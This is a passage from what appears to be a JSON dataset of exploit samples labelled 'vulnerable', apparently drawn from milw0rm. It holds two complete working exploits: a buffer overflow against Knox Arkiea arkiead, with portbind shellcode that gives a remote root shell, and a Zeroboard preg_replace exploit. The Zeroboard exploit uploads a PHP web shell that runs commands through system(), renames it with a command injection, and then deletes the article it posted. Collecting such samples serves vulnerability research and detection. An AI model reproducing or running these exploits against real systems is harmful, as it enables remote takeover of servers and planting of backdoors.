crash\n\n\n\n\tEnd:\n\n\t}\n\n}\n\n\n\n// milw0rm.com [2005-05-31]",
115        "vulnerable": true
116    },
117    {
118        "exploit_id": 102,
119        "content": "/*\n\n * Knox Arkiea arkiead local/remote root exploit.\n\n *\n\n * Portbind 5074 shellcode\n\n *\n\n * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.\n\n * \n\n * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.\n\n * A previous request forces a large allocation of NOP's + shellcode in heap\n\n * memory.  Find additional targets by searching the heap for NOP's after a \n\n * crash.  safeaddr must point to any area of memory that is read/writable\n\n * and won't mess with program/shellcode flow. \n\n *\n\n * ./ark_sink host targetnum \n\n * [user@host dir]$ ./ark_sink 192.168.1.2 1\n\n * [*] Connected to 192.168.1.2:617\n\n * [*] Connected to 192.168.1.2:617\n\n * [*] Sending nops+shellcode\n\n * [*] Done, sleeping\n\n * [*] Sending overflow\n\n * [*] Done\n\n * [*] Sleeping and connecting remote shell\n\n * [*] Connected to 192.168.1.2:5074\n\n * [*] Success, enjoy\n\n * id\n\n * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\n\n *\n\n *\n\n */\n\n\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n#include <netdb.h>\n\n#include <sys/socket.h>\n\n#include <sys/errno.h>\n\n#include <sys/types.h>\n\n#include <netinet/in.h>\n\n#include <arpa/nameser.h>\n\n\n\n\n\n#define BUFLEN\t\t10000\t\t/* for getshell()  \t\t*/\n\n#define LEN \t\t280\t\t/* overflow packet data section    */\n\n#define HEAD_LEN \t8\t\t               /*  overflow packet header\t*/\n\n#define NOP_LEN\t\t10000\t\t/* nop+shellcode packet \t*/\n\n#define ARK_PORT\t617\n\n#define SHELL_PORT\t5074\n\n#define NOP \t\t0x90\n\n#define NUMTARGS\t2\n\n\n\nstruct {\n\n\tchar \t\t*os;\n\n\tunsigned int\ttargret;\n\n\tunsigned int\ttargsafe;\n\n} targets[] = {\n\n\t{ \"Redhat 8.0\", 0x80ecf90, 0x080eb940 },\n\n\t{ \"Redhat 7.2\", 0x80eddc0, 0x080eb940 },\n\n\tNULL\n\n};\n\n\n\n\n\n/* portbind 5074 */\n\nconst char shellcode[] = \n\n\"\\x89\\xc3\\xb0\\x02\\xcd\\x80\\x38\\xc3\\x74\\x05\\x8d\\x43\\x01\\xcd\\x80\"\n\n\"\\x31\\xc0\\x89\\x45\\x10\\x40\\x89\\xc3\\x89\\x45\\x0c\\x40\\x89\\x45\\x08\"\n\n\"\\x8d\\x4d\\x08\\xb0\\x66\\xcd\\x80\\x89\\x45\\x08\\x43\\x66\\x89\\x5d\\x14\"\n\n\"\\x66\\xc7\\x45\\x16\\x13\\xd2\\x31\\xd2\\x89\\x55\\x18\\x8d\\x55\\x14\"\n\n\"\\x89\\x55\\x0c\\xc6\\x45\\x10\\x10\\xb0\\x66\\xcd\\x80\\x40\\x89\\x45\\x0c\"\n\n\"\\x43\\x43\\xb0\\x66\\xcd\\x80\\x43\\x89\\x45\\x0c\\x89\\x45\\x10\\xb0\\x66\"\n\n\"\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\"\n\n\"\\x75\\xf6\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\"\n\n\"\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\n\n\n\nunsigned int resolve(char *hostname)\n\n{\n\n\tu_long \tip = 0;\n\n\tstruct hostent\t*hoste;\n\n\n\n\tif ((int)(ip = inet_addr(hostname)) == -1)\n\n\t{\n\n\t\tif ((hoste = gethostbyname(hostname)) == NULL)\n\n\t\t{\n\n\t\t\therror(\"[!] gethostbyname\");\n\n\t\t\texit(-1);\n\n\t\t}\n\n\t\tmemcpy(&ip, hoste->h_addr, hoste->h_length);\n\n\t}\n\n\treturn(ip);\n\n}\n\n\n\n\n\nint isock(char *hostname, int portnum)\n\n{\n\n\tstruct sockaddr_in\tsock_a;\n\n\tint\t\t\tnum, sock;\n\n\tunsigned int\t\tip;\n\n\tfd_set\t\t\tinput;\n\n\n\n\tsock_a.sin_family = AF_INET;\n\n\tsock_a.sin_port = htons(portnum);\n\n\tsock_a.sin_addr.s_addr = resolve(hostname);\n\n\n\n\tif ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\n\n\t{\n\n\t\therror(\"[!] accept\");\n\n\t\texit(-1);\n\n\t}\n\n\t\n\n\tif (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))\n\n\t{\n\n\t\therror(\"[!] connect\");\n\n\t\texit(-1);\n\n\t}\n\n\t\n\n\tfprintf(stderr, \"[*] Connected to %s:%d\\n\", hostname, portnum);\n\n\treturn(sock);\n\n\t\n\n}\n\n\n\nint getshell(int sock)\n\n{\n\n\n\n\tchar\tbuf[BUFLEN];\n\n\tint\tnread=0;\n\n\n\n  \twhile(1) \n\n\t{ \n\n    \t\tfd_set input; \n\n    \t\tFD_SET(0,&input); \n\n    \t\tFD_SET(sock,&input); \n\n    \t\tselect(sock+1,&input,NULL,NULL,NULL); \n\n    \t\n\n\t\tif(FD_ISSET(sock,&input)) \n\n\t\t{ \n\n      \t\t\tnread=read(sock,buf,BUFLEN); \n\n      \t\t\twrite(1,buf,nread); \n\n     \t\t} \n\n     \t\tif(FD_ISSET(0,&input)) \n\n     \t\t\twrite(sock,buf,read(0,buf,BUFLEN)); \n\n  \t} \n\n}\n\n\n\nint usage(char *progname)\n\n{\n\n\tint \ti;\n\n\n\n\tfprintf(stderr, \"Usage:\\n./%s hostname target_num\\n\");\n\n\tfor (i = 0; targets[i].os; i++)\n\n\t\tfprintf(stderr, \"Target %d: %s\\n\", i+1, targets[i].os);\n\n\texit(-1);\n\n}\n\n\n\nint main( int argc, char **argv)\n\n{\n\n\n\n\t/* first 2 bytes are a type 74 request */\n\n\t/* last two bytes length */\n\n\tchar \t\thead[] = \"\\x00\\x4a\\x00\\x03\\x00\\x01\\xff\\xff\";\n\n\tchar \t\tdata[512];\n\n\tchar\t\tsc_req[20000];\n\n\tchar\t\t*host;\n\n\tunsigned int\t\ttnum;\n\n\tunsigned int \tsafeaddr;\n\n\tunsigned int \tret;\n\n\tint\t\tdatalen\t\t= LEN;\n\n\tint\t\tport\t\t= ARK_PORT;\n\n\tunsigned int\taddr\t\t= 0;\n\n\tint\t\tsock_overflow, sock_nops, sock_shell;\n\n\tint \t\ti;\n\n\n\n\tif (argc == 3)\n\n\t{\n\n\t\thost = argv[1];\n\n\t\ttnum = atoi(argv[2]);\n\n\t\tif (tnum > NUMTARGS || tnum == 0)\n\n\t\t{\n\n\t\t\tfprintf(stderr, \"[!] Invalid target\\n\");\n\n\t\t\tusage(argv[0]);\n\n\t\t}\n\n\t}\n\n\telse\n\n\t{\n\n\t\tusage(argv[0]);\n\n\t}\n\n\t\n\n\ttnum--;\n\n\tret = targets[tnum].targret;\n\n\tsafeaddr = targets[tnum].targsafe;\n\n\n\n\tsock_overflow = sock_nops = sock_shell = 0;\n\n\tsock_nops = isock(host, port);\n\n\tsock_overflow = isock(host, port);\n\n\n\n\t// build data section of overflow packet\n\n\tmemset(data, 0x90, datalen);\n\n\tfor (i = 0; i < datalen; i += 4)\n\n\t\tmemcpy(data+i, (char *)&ret, 4);\n\n\t// we overwrite a pointer that must be a valid address\n\n\tmemcpy(data+datalen-12, (char *)&safeaddr, 4); \n\n\n\n\t// build header of overflow packet\n\n\tdatalen = ntohs(datalen);\n\n\tmemcpy(head+6, (char *)&datalen, 2);\n\n\n\n\t// build invalid packet with nops+shellcode\n\n\tmemset(sc_req, 0x90, NOP_LEN+1);\n\n\tmemcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));\n\n\n\n\t// send invalid nop+shellcode packet\n\n\tfprintf(stderr, \"[*] Sending nops+shellcode\\n\");\n\n\twrite(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); \n\n\tfprintf(stderr, \"[*] Done, sleeping\\n\");\n\n\tsleep(1);\n\n\tclose(sock_nops);\n\n\n\n\t// send overflow\n\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\n\n\twrite(sock_overflow, head, HEAD_LEN);\n\n\twrite(sock_overflow, data, LEN);\n\n\tfprintf(stderr, \"[*] Done\\n\");\n\n\tfprintf(stderr, \"[*] Sleeping and connecting remote shell\\n\");\n\n\tsleep (1);\n\n\tclose(sock_overflow);\n\n\n\n\t// connect to shell\n\n\tsock_shell = isock(host, SHELL_PORT);\n\n\tfprintf(stderr, \"[*] Success, enjoy\\n\");\n\n\tgetshell(sock_shell);\n\n\n\n}\n\n\n\n\n\n// milw0rm.com [2003-09-20]",
120        "vulnerable": true
121    },
122    {
123        "exploit_id": 1020,
124        "content": "/*\n\n*\n\n----------------------------------------------------------------------------------\n\n[+] Zeroboard preg_replace vulnerability Remote nobody shell exploit \n\n----------------------------------------------------------------------------------\n\n\n\n> by n0gada (n0gada@null2root.org)\n\n\n\n[*] date : 2005/5/29\n\n\n\n[*] the bug\n\n\n\nOriginal advisory: \n\n- http://pandora.sapzil.info/text/notify/20050123.zb41advisory.php\n\n\n\nApplication\n\n- Zeroboard 4.1 pl2 - 4.1 pl5\n\n\n\nReference:\n\n- http://www.nzeo.com\n\n\n\n[*] Target - My test server\n\n\n\n$ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test\n\n- Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test\n\n\n\n[+] xxx.xxx.xxx connecting ok!\n\n[+] Zeroboard writing . ok!\n\n[+] Confirmming your article - found!\n\n[+] Exploiting zeroboard start ............................... Done!\n\n[*] Confirmming your backdoor php script - \n\nhttp://xxx.xxx.xxx/zboard/data/test/shell.php is generated!\n\n[+] Exploiting success!!\n\n[*] Remove your article - ok! :)\n\n\n\n------------------------------------------------------------------------------\n\n*\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdarg.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <unistd.h>\n\n#include <netdb.h>\n\n#include <sys/types.h>\n\n#include <signal.h>\n\n#include <time.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n#include <sys/select.h>\n\n#include <errno.h>\n\n\n\n\n\n#define BUFSIZE 4096\n\n#define READSIZE 1500\n\n\n\nvoid ParseZbHost(char *);\n\nvoid ConnectZboard(char *, unsigned short);\n\nvoid WriteZboard(void);\n\nvoid ExploitZboard(void);\n\nvoid ConfirmPHPScript(void);\n\nvoid DeleteArticle(void);\n\nvoid StatusProcess(void);\n\nvoid Usage(char *);\n\nvoid OutputErr(char *, int);\n\n\n\nchar *zb_host;\n\nchar *zb_dir;\n\nchar *zb_tid;\n\nunsigned short zb_port;\n\n\n\nint sockfd = -1;\n\nint reconn=0;\n\nchar ReadBuf[READSIZE];\n\nchar WriteBuf[BUFSIZE];\n\nchar TempBuf[BUFSIZ];\n\nchar no[16];\n\n\n\n\n\nint main(int argc, char *argv[]){\n\n\n\nif(argc < 2) Usage(argv[0]);\n\n\n\nif(argc > 2) zb_port = atoi(argv[2]); \n\nelse zb_port = 80;\n\n\n\n// http://host/bbs/zboard.php?id=test \n\n\n\nParseZbHost(argv[1]);\n\n\n\nConnectZboard(zb_host, zb_port);\n\n\n\nWriteZboard();\n\n\n\nExploitZboard();\n\n\n\nConfirmPHPScript();\n\n\n\nDeleteArticle();\n\n}\n\n\n\nvoid ParseZbHost(char *zbhost)\n\n{\n\nchar *psbuf;\n\nchar *sptr=NULL;\n\nchar *eptr=NULL;\n\n\n\npsbuf = malloc(strlen(zbhost)+1);\n\n\n\nstrcpy(psbuf, zbhost);\n\n\n\nif((sptr = strstr(psbuf,\"http://\")) == NULL) OutputErr(\"http://host need\\n\", 0);\n\n\n\nzb_host = sptr+7;\n\n\n\nsptr = strchr(zb_host, '/');\n\nsptr[0] = '\\0';\n\nsptr++;\n\n\n\nif((eptr = strstr(sptr, \"zboard.php?id=\")) == NULL) OutputErr(\"\\\"zboard.php?id=\\\" \n\nneed\\n\", 0);\n\n\n\nzb_tid = eptr+14;\n\n\n\neptr--;\n\neptr[0] = '\\0';\n\n\n\nzb_dir = sptr;\n\n\n\nfprintf(stdout, \" - Target : http://%s/%s/zboard.php?id=%s\\n\", zb_host, zb_dir, \n\nzb_tid);\n\nfflush(stdout); \n\n}\n\n\n\n\n\nvoid ConnectZboard(char *server, unsigned short port)\n\n{\n\n\n\nstruct sockaddr_in serv; \n\nstruct hostent *hostname;\n\n\n\nif(!(hostname = gethostbyname(server))) OutputErr(server, 1);\n\nif((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) OutputErr(\"socket\", 1);\n\n\n\nmemset(&serv, 0, sizeof(serv));\n\nserv.sin_family = AF_INET;\n\nserv.sin_port = htons(port);\n\nserv.sin_addr.s_addr = *((unsigned long *)hostname->h_addr_list[0]);\n\n// serv.sin_addr = *((struct in_addr *)hostname->h_addr_list[0]);\n\n\n\nif(connect(sockfd, (struct sockaddr *)&serv, sizeof(struct sockaddr)) < 0)\n\nOutputErr(\"connect\", 1);\n\n\n\nif(!reconn) fprintf(stdout,\"\\n [+] %s connecting ok!\\n\", server);\n\nelse if(reconn == 1) fprintf(stdout, \" [+] %s reconnecting ok!\\n\", server);\n\nfflush(stdout);\n\n\n\nreconn = 0;\n\n}\n\n\n\nvoid WriteZboard(void)\n\n{\n\nfd_set fds;\n\nstruct timeval tv;\n\nint err = -1;\n\nint i = 0;\n\nint cnt=0;\n\nchar *tmp_ptr, *ptr;\n\nchar form_data[BUFSIZE];\n\n\n\nmemset(form_data, 0, sizeof(form_data));\n\nsprintf(form_data,\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"page\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"1\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"id\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"%s\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"no\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"select_arrange\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"headnum\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"desc\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"asc\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"page_num\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"keyword\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"category\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"sn\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"off\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"ss\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"on\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"sc\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"on\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"mode\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"write\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"password\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"1212\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"name\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"zero\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"email\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"zero@nzeo.com\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"homepage\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"subject\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"zero@nzeo.com hi~!\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"memo\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"`mv data/%s/d214924151d9e1ffac5bb2258561031e \n\ndata/%s/shell.php`;# 70ab423bfaea846c9db0b96126254103\\r\\n\"\n\n//\"-----------------------------8ac34985126d8\\r\\n\"\n\n//\"Content-Disposition: form-data; name=\\\"sitelink1\\\"\\r\\n\"\n\n//\"\\r\\n\"\n\n//\"\\r\\n\"\n\n//\"-----------------------------8ac34985126d8\\r\\n\"\n\n//\"Content-Disposition: form-data; name=\\\"sitelink2\\\"\\r\\n\"\n\n//\"\\r\\n\"\n\n//\"\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"file1\\\"; \n\nfilename=\\\"d214924151d9e1ffac5bb2258561031e\\\"\\r\\n\"\n\n\"Content-Type: text/plain\\r\\n\"\n\n\"\\r\\n\"\n\n\"<?\n\nif(count($_GET)) extract($_GET);\n\nif(count($_POST)) extract($_POST);\n\nif(count($_SERVER)) extract($_SERVER);\n\necho \\\"<form action=$PHP_SELF method=post>\n\ncommand : <input type=text name=cmd>\n\n<input type=submit></form><hr>\\\";\n\nif($cmd){\n\n$cmd = str_replace(\\\"\\\\\\\\\\\", \\\"\\\", $cmd);\n\necho \\\"<pre>\\\"; system($cmd); echo \\\"</pre>\\\";\n\n}\n\n?>\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"file2\\\"; filename=\\\"\\\"\\r\\n\"\n\n\"Content-Type: application/octet-stream\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"x\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"36\\r\\n\"\n\n\"-----------------------------8ac34985126d8\\r\\n\"\n\n\"Content-Disposition: form-data; name=\\\"y\\\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"11\\r\\n\"\n\n\"-----------------------------8ac34985126d8--\\r\\n\"\n\n, zb_tid, zb_tid, zb_tid);\n\n\n\n\n\n\n\nmemset(WriteBuf, 0, sizeof(WriteBuf));\n\n\n\nsprintf(WriteBuf,\n\n\"POST /%s/write_ok.php HTTP/1.1\\r\\n\"\n\n\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, \n\napplication/x-shockwave-flash, application/vnd.ms-excel, \n\napplication/vnd.ms-powerpoint, application/msword, */*\\r\\n\" \n\n\"Referer: http://%s/%s/write.php?id=%s&page=1&sn1=&divpage=1&\n\nsn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=&\n\nmode=write&sn1=&divpage=1\\r\\n\"\n\n\"Content-Type: multipart/form-data; boundary=---------------------------8ac34985126d8\\r\\n\"\n\n\"Accept-Encoding: gzip, deflate\\r\\n\"\n\n\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\\r\\n\"\n\n\"Host: %s\\r\\n\"\n\n\"Content-Length: %d\\r\\n\"\n\n\"Connection: Keep-Alive\\r\\n\"\n\n\"Cache-Control: no-cache\\r\\n\" \n\n\"\\r\\n\"\"%s\", zb_dir, zb_host, zb_dir, zb_tid, zb_host, strlen(form_data), form_data);\n\n\n\nfprintf(stdout, \" [+] Zeroboard writing \");\n\nfflush(stdout);\n\n\n\nif(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr(\"write\", 1);\n\n\n\ntv.tv_sec = 60;\n\ntv.tv_usec = 0;\n\n\n\nFD_ZERO(&fds);\n\n\n\nfor(;;){\n\n\n\nmemset(ReadBuf, 0, sizeof(ReadBuf));\n\n\n\nif(i!=0xb33f) StatusProcess();\n\n\n\nFD_SET(sockfd, &fds);\n\n\n\nif(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr(\"select\", 1);\n\nif(FD_ISSET(sockfd, &fds)){\n\n\n\nif(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr(\"read\", 1);\n\n\n\n\n\nif(strstr(ReadBuf, \"HTTP/1.1 \")){\n\nif(strstr(ReadBuf+17, \"Connection: close\\r\\n\")) reconn = 1;\n\n\n\nif(strstr(ReadBuf+9, \"200 OK\\r\\n\")) { \n\nerr++;\n\n}\n\nelse if(strstr(ReadBuf+9, \"404 Not Found\\r\\n\")){\n\nOutputErr(\" failed!(page not found)\\n\", 0);\n\n}\n\nelse if(strstr(ReadBuf+9, \"400 Bad Request\\r\\n\")){\n\nOutputErr(\" failed!(Bad Request)\\n\", 0);\n\n}\n\nelse {\n\nOutputErr(ReadBuf, 0);\n\n}\n\n\n\n}\n\n\n\nif(err == 0){\n\n\n\nif(strstr(ReadBuf,\"<meta http-equiv=\\\"refresh\\\" content=\\\"0; url=zboard.php?id=\"))\n\n{\n\nfprintf(stdout, \" ok!\\n\");\n\nfflush(stdout);\n\n\n\nfprintf(stdout,\" [+] Confirmming your article\");\n\nfflush(stdout);\n\n\n\nif(tmp_ptr = strstr(ReadBuf+18, \"url=\")) {\n\n\n\nptr = tmp_ptr+4;\n\nif(ptr != NULL){\n\nif(tmp_ptr = strchr(ptr,'\"')) tmp_ptr[0] = '\\0';\n\n}\n\n} \n\nif(ptr = strstr(ReadBuf,\"=&no=\")){\n\nptr += 5;\n\nmemset(no, 0, sizeof(no));\n\nfor(i=0; i<16; i++){\n\nif(ptr[i] == '&') break;\n\nno[i] = ptr[i];\n\n}\n\n}\n\nif(strlen(no) > 0){\n\nfprintf(stdout,\" - found!\\n\");\n\nfflush(stdout);\n\nreturn;\n\n}\n\nelse {\n\nOutputErr(\" - failed!(not writed!?!)\\n\", 0);\n\n}\n\n} \n\nelse {\n\nif(strstr(ReadBuf,\"Total Excuted Time :\") && strstr(ReadBuf,\"\\x30\\x0d\\x0a\\x0d\\x0a\")) break;\n\n}\n\n}\n\nelse {\n\nOutputErr(\"err number error\\n\", 0);\n\n}\n\n}\n\n}\n\n\n\nfprintf(stderr, \" error!\\n\");\n\n\n\n}\n\n\n\nvoid ExploitZboard(void)\n\n{\n\nfd_set fds;\n\nstruct timeval tv;\n\nint err = -1;\n\n\n\nif(reconn == 1) ConnectZboard(zb_host, zb_port);\n\n\n\nmemset(WriteBuf, 0, sizeof(WriteBuf));\n\n\n\nsprintf(WriteBuf, \n\n\"GET /%s/view.php?id=%s&page=1&sn1=&divpage=1&sn=off&ss=off&\n\nsc=on&keyword=70ab423bfaea846c9db0b96126254103/e\"\n\n, zb_dir, zb_tid);\n\n\n\nmemcpy(WriteBuf+strlen(WriteBuf), \"\\x25\\x30\\x30\", 3);\n\n\n\nsprintf(WriteBuf+strlen(WriteBuf),\n\n\"&select_arrange=headnum&desc=asc&no=%s HTTP/1.1\\r\\n\"\n\n\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,\n\napplication/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\\r\\n\"\n\n\"Referer: http://%s/%s/zboard.php\\r\\n\"\n\n\"Accept-Encoding: gzip, deflate\\r\\n\"\n\n\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\\r\\n\"\n\n\"Host: %s\\r\\n\"\n\n\"Connection: Keep-Alive\\r\\n\"\n\n\"\\r\\n\", no, zb_host, zb_dir, zb_host);\n\n\n\nfprintf(stdout, \" [+] Exploiting zeroboard start \");\n\nfflush(stdout);\n\n\n\nif(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr(\"write\", 1);\n\n\n\ntv.tv_sec = 60;\n\ntv.tv_usec = 0;\n\n\n\nFD_ZERO(&fds);\n\n\n\nfor(;;){\n\n\n\nStatusProcess();\n\n\n\nmemset(ReadBuf, 0, sizeof(ReadBuf));\n\n\n\nFD_SET(sockfd, &fds);\n\nif(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr(\"select\", 1);\n\nif(FD_ISSET(sockfd, &fds)){\n\n\n\nif(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr(\"read\", 1);\n\n\n\n\n\nif(strstr(ReadBuf, \"HTTP/1.1 \")){\n\n\n\nif(strstr(ReadBuf,\"Connection: close\\r\\n\")) reconn = 1;\n\n\n\nif(strstr(ReadBuf+9, \"200 OK\\r\\n\")) { \n\nerr++; \n\n}\n\nelse if(strstr(ReadBuf+9, \"404 Not Found\\r\\n\")){\n\nOutputErr(\" failed!(page not found)\\n\", 0);\n\n}\n\nelse if(strstr(ReadBuf+9, \"400 Bad Request\\r\\n\")){\n\nOutputErr(\" failed!(Bad Request)\\n\", 0);\n\n}\n\nelse {\n\nOutputErr(ReadBuf, 0);\n\n}\n\n\n\n}\n\n\n\nif(err >= 0){\n\n\n\nif(strstr(ReadBuf,\"Total Excuted Time :\") && strstr(ReadBuf, \"\\x30\\x0d\\x0a\\x0d\\x0a\")){\n\nfprintf(stdout,\" Done!\\n\"); \n\nfflush(stdout);\n\nreturn;\n\n}\n\n\n\n}\n\n\n\n}\n\n}\n\n\n\nfprintf(stderr,\" error!\\n\"); \n\n\n\n}\n\n\n\nvoid ConfirmPHPScript(void)\n\n{\n\nfd_set fds;\n\nstruct timeval tv;\n\n\n\nif(reconn == 1) ConnectZboard(zb_host, zb_port); \n\n\n\nmemset(WriteBuf, 0, sizeof(WriteBuf));\n\nsprintf(WriteBuf,\n\n\"GET /%s/data/%s/shell.php HTTP/1.1\\r\\n\"\n\n\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,\n\napplication/x-shockwave-flash, application/vnd.ms-excel,\n\napplication/vnd.ms-powerpoint, application/msword, */*\\r\\n\"\n\n\"Referer: http://%s/%s/zboard.php\\r\\n\"\n\n\"Accept-Encoding: gzip, deflate\\r\\n\"\n\n\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\\r\\n\"\n\n\"Host: %s\\r\\n\"\n\n\"Connection: Keep-Alive\\r\\n\"\n\n\"\\r\\n\", zb_dir, zb_tid, zb_host, zb_dir, zb_host);\n\n\n\nfprintf(stdout, \" [*] Confirmming your backdoor php script\");\n\nfflush(stdout);\n\n\n\nif(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr(\"write\", 1);\n\n\n\ntv.tv_sec = 60;\n\ntv.tv_usec = 0;\n\n\n\n\n\nFD_ZERO(&fds);\n\n\n\nfor(;;){\n\nmemset(ReadBuf, 0, sizeof(ReadBuf));\n\n\n\nFD_SET(sockfd, &fds);\n\nif(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr(\"select\", 1);\n\nif(FD_ISSET(sockfd, &fds)){\n\nif(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr(\"read\", 1);\n\n\n\n\n\nif(strstr(ReadBuf, \"HTTP/1.1 \")){\n\nif(strstr(ReadBuf,\"Connection: close\\r\\n\")) reconn = 1;\n\n\n\nif(strstr(ReadBuf+9, \"200 OK\\r\\n\")) { \n\nfprintf(stdout,\" - http://%s/%s/data/%s/shell.php is generated!\\n \n\n[+] Exploiting success!!\\n\", zb_host, zb_dir, zb_tid);\n\nfflush(stdout);\n\nreturn;\n\n}\n\nelse if(strstr(ReadBuf+9, \"404 Not Found\\r\\n\")){\n\nOutputErr(\" - page not found\\n - 'mv' instruction permission denied.\\n - zeroboard was patched.\\n\"\n\n\" [-] Exploit failed!\\n\", 0);\n\n}\n\nelse if(strstr(ReadBuf+9, \"400 Bad Request\\r\\n\")){\n\nOutputErr(\" - Bad Request\\n\"\n\n\" [-] Exploit failed!\\n\", 0);\n\n}\n\nelse {\n\nOutputErr(ReadBuf, 0);\n\n}\n\n}\n\n\n\n\n\n}\n\n}\n\n\n\nfprintf(stderr,\" error!\\n\");\n\n}\n\n\n\n\n\nvoid DeleteArticle(void)\n\n{\n\nfd_set fds;\n\nstruct timeval tv;\n\nchar post_data[BUFSIZ];\n\n\n\n\n\nif(reconn == 1) ConnectZboard(zb_host, zb_port);\n\n\n\nsprintf(post_data,\n\n\"page=1&id=%s&no=%s&select_arrange=headnum&desc=asc&page_num=20&keyword=&category=&sn=off&ss=off&sc=on&mode=&c_no=&password=1212&x=20&y=9\\r\\n\", zb_tid, no);\n\n\n\nmemset(WriteBuf, 0, sizeof(WriteBuf));\n\nsprintf(WriteBuf,\n\n\"POST /%s/delete_ok.php HTTP/1.1\\r\\n\"\n\n\"Accept: image/gif, image/x-xbitmap, image/jpeg, 